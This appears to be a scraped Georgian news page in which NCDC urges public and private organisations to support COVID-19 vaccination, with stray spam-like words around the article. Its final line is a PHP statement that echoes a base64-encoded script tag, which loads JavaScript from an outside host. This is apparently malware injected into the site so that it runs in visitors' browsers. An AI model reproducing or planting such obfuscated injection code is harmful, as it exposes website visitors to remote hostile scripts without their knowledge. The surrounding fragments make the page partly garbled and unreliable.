celsiusi
ავერსი შნაიდერი
დაავადებათა კონტროლის ეროვნული ცენტრი როგორც სამთავრობო, ისე კერძო სექტორს ვაქცინაციის კამპანიაში აქტიური ჩართვისკენ მოუწოდებს. როგორც ორგანიზაციის განცხადებაშია ნათქვამი, NCDC მზად არის, ჩაატაროს დამატებითი საინფორმაციო შეხვედრები და ორგანიზაციების თანამშრომლების ნებისმიერ შეკითხვაზე გასცეს პასუხი.  
 
"დღეს, ეპიდსიტუაციიდან გამომდინარე, უკიდურესად მნიშვნელოვანია დროის მოკლე პერიოდში მაქსიმალურად გაძლიერდეს ვაქცინაციის პროცესი, რადგან COVID-ინფექციის გავრცელებისა და ჰოსპიტალურ სექტორზე ზეწოლის და, შედეგად, სიკვდილიანობის შემცირების ძირითადი გზა სრულად ვაქცინირებული მოსახლეობის რაოდენობის მაქსიმალური ზრდაა.
 
მნიშვნელოვანია ვაქცინაციის კამპანიაში მაქსიმალურად ჩაერთოს სამთავრობო და კერძო სექტორი, ფარმაცევტული, სავაჭრო, სამრეწველო, საბანკო, სამასპინძლო, საგანმანათლებლო და სხვა სექტორები, რათა თანდათან სულ უფრო მეტი ორგანიზაცია გახდეს “COVID-უსაფრთხო”.
 
დაავადებათა კონტროლისა და საზოგადოებრივი ჯანმრთელობის ეროვნული ცენტრი მზად არის ჩაატაროს დამატებითი საინფორმაციო ონლაინშეხვედრები სხვადასხვა ორგანიზაციის თანამშრომელთათვის და ამომწურავი პასუხი გასცეს ყველა მათ შეკითხვას", - ნათქვამია NCDC-ს განცხადებაში.
1001
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");